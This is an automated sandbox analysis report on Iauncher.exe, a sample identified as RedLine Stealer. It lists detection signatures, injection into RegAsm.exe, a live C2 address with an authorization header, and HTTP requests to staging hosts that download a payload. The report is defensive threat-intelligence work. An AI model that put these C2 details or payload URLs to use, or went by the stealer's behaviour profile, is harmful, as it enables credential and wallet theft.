Edit tour

Windows Analysis Report
Iauncher.exe

Overview

General Information

Sample name:	Iauncher.exe
Analysis ID:	1434866
MD5:	e69feb7fd40f408a088d879be323f37a
SHA1:	0f71fa75df6795c43c69e7ec5689c995c135079e
SHA256:	463dd34a95d86ca5d08059f1ec80d3b00d3bbabdc74936025b7e30ef2b3ee931
Tags:	exe
Infos:

Detection

RedLine

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected RedLine Stealer

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Iauncher.exe (PID: 2448 cmdline: "C:\Users\user\Desktop\Iauncher.exe" MD5: E69FEB7FD40F408A088D879BE323F37A)

Iauncher.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe" MD5: D79977A15EB010C637CF9078B4EB82C8)

conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7452 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": "147.45.47.65:47232", "Bot Id": "\ueb45", "Authorization Header": "a6a58668f69a7e8a13c2ff0e52c1d284"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Iauncher.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1618643197.0000000000482000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.1978480941.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Process Memory Space: Iauncher.exe PID: 2448	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Iauncher.exe PID: 7404	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7452	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7452	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
0.0.Iauncher.exe.480000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
2.2.Iauncher.exe.f40030.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
4.2.RegAsm.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.Iauncher.exe.5ae0000.10.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.Iauncher.exe.f10000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.Iauncher.exe.f40030.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.Iauncher.exe.3d11a10.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Click to see the 2 entries

Snort Signatures

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 147.45.47.65 - Destination IP: 192.168.2.7

Timestamp:	05/01/24-20:35:54.029434
SID:	2043234
Source Port:	47232
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.7 - Destination IP: 147.45.47.65

Timestamp:	05/01/24-20:35:53.101816
SID:	2046045
Source Port:	49711
Destination Port:	47232
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) - Source IP: 147.45.47.65 - Destination IP: 192.168.2.7

Timestamp:	05/01/24-20:36:00.399690
SID:	2046056
Source Port:	47232
Destination Port:	49711
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.7 - Destination IP: 147.45.47.65

Timestamp:	05/01/24-20:36:05.641411
SID:	2043231
Source Port:	49711
Destination Port:	47232
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: RedLine {"C2 url": "147.45.47.65:47232", "Bot Id": "\ueb45", "Authorization Header": "a6a58668f69a7e8a13c2ff0e52c1d284"}

Multi AV Scanner detection for submitted file

Source: Iauncher.exe

ReversingLabs: Detection: 23%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Iauncher.exe

Joe Sandbox ML: detected

Source: Iauncher.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.44.179:443 -> 192.168.2.4:49741 version: TLS 1.2

Source: Iauncher.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: Iauncher.exe
Source:	Binary string: costura.costura.pdb.compressedlB^q source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed source: Iauncher.exe
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: Iauncher.exe
Source:	Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe

Code function: 2_2_00F2960E FindFirstFileExW,

2_2_00F2960E

Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_05CB7908
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_05CB78F8
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_05CB7A41
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_07926ED0
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then jmp 07925E51h	0_2_07925A10
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then jmp 09F19332h	0_2_09F191F0
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then jmp 09F1F7CAh	0_2_09F1F1B8
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then inc dword ptr [ebp-10h]	0_2_09F1F1B8
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then jmp 09F19B8Ah	0_2_09F153C4
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then jmp 09F16C89h	0_2_09F1531C
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then lea esp, dword ptr [ebp-08h]	0_2_09F1CDAC
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then jmp 09F173C4h	0_2_09F16EAF
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then jmp 09F17957h	0_2_09F16EAF
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then jmp 09F19B8Ah	0_2_09F19348
Source: C:\Users\user\Desktop\Iauncher.exe	Code function: 4x nop then jmp 09F173C4h	0_2_09F16780

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.7:49711 -> 147.45.47.65:47232
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.7:49711 -> 147.45.47.65:47232
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 147.45.47.65:47232 -> 192.168.2.7:49711
Source: Traffic	Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 147.45.47.65:47232 -> 192.168.2.7:49711

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 147.45.47.65:47232

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.Iauncher.exe.5ae0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Iauncher.exe.3d11a10.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.4:49742 -> 147.45.47.65:47232

Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/z-Closing.txt HTTP/1.1Host: antiloxss.usite.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/hwid.txt HTTP/1.1Host: antiloxss.usite.pro
Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/LM19AR/hwids.txt HTTP/1.1Host: antiloxss.usite.pro
Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt HTTP/1.1Host: antiloxss.usite.pro
Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt HTTP/1.1Host: antiloxss.usite.pro
Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt HTTP/1.1Host: antiloxss.usite.pro
Source: global traffic	HTTP traffic detected: GET /Iauncher.zip HTTP/1.1Host: gitgo.orgConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.47.65
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/z-Closing.txt HTTP/1.1Host: antiloxss.usite.proConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/hwid.txt HTTP/1.1Host: antiloxss.usite.pro
Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/LM19AR/hwids.txt HTTP/1.1Host: antiloxss.usite.pro
Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt HTTP/1.1Host: antiloxss.usite.pro
Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt HTTP/1.1Host: antiloxss.usite.pro
Source: global traffic	HTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt HTTP/1.1Host: antiloxss.usite.pro
Source: global traffic	HTTP traffic detected: GET /Iauncher.zip HTTP/1.1Host: gitgo.orgConnection: Keep-Alive

Source: Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: CLIENT_VERSIONthttp://gdata.youtube.com/feeds/api/videos/{0}?v=2&alt=jsonDFailed to get youtube video data: Lhttp://vimeo.com/api/v2/video/{0}.json@Failed to get vimeo video data: ork Manager. LICENSE MODULE The license module enables you to work without interruptions. Issues with the module can be caused by: (i) Framework Manager is not installed (ii) HDD formatting (iii) OS reintallation, (iv) Siticone Files Deletion, or (v) Any other issues. For assistance, please contact our support centre at: support@siticoneframework.comPMissing Manager or the Module is corrupt4Download Framework Manager4Contact Our Support CentreHmailto:support@siticoneframework.comDhttps://www.siticoneframework.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: antiloxss.usite.pro
Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: gitgo.org

Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://antiloxss.usite.pro
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000029D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://antiloxss.usite.prod
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: Iauncher.exe, 00000000.00000002.3509420380.00000000028EA000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3508288083.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://gdata.youtube.com/feeds/api/videos/
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gitgo.org
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002A51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gitgo.orgd
Source: RegAsm.exe, 00000004.00000002.1979253603.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adp/1.0/g
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: Iauncher.exe, 00000000.00000002.3509420380.0000000002831000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003841000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3511337540.0000000003D11000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3516730378.0000000005AE0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegAsm.exe, 00000004.00000002.1979402537.00000000026F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: RegAsm.exe, 00000004.00000002.1979402537.0000000002797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
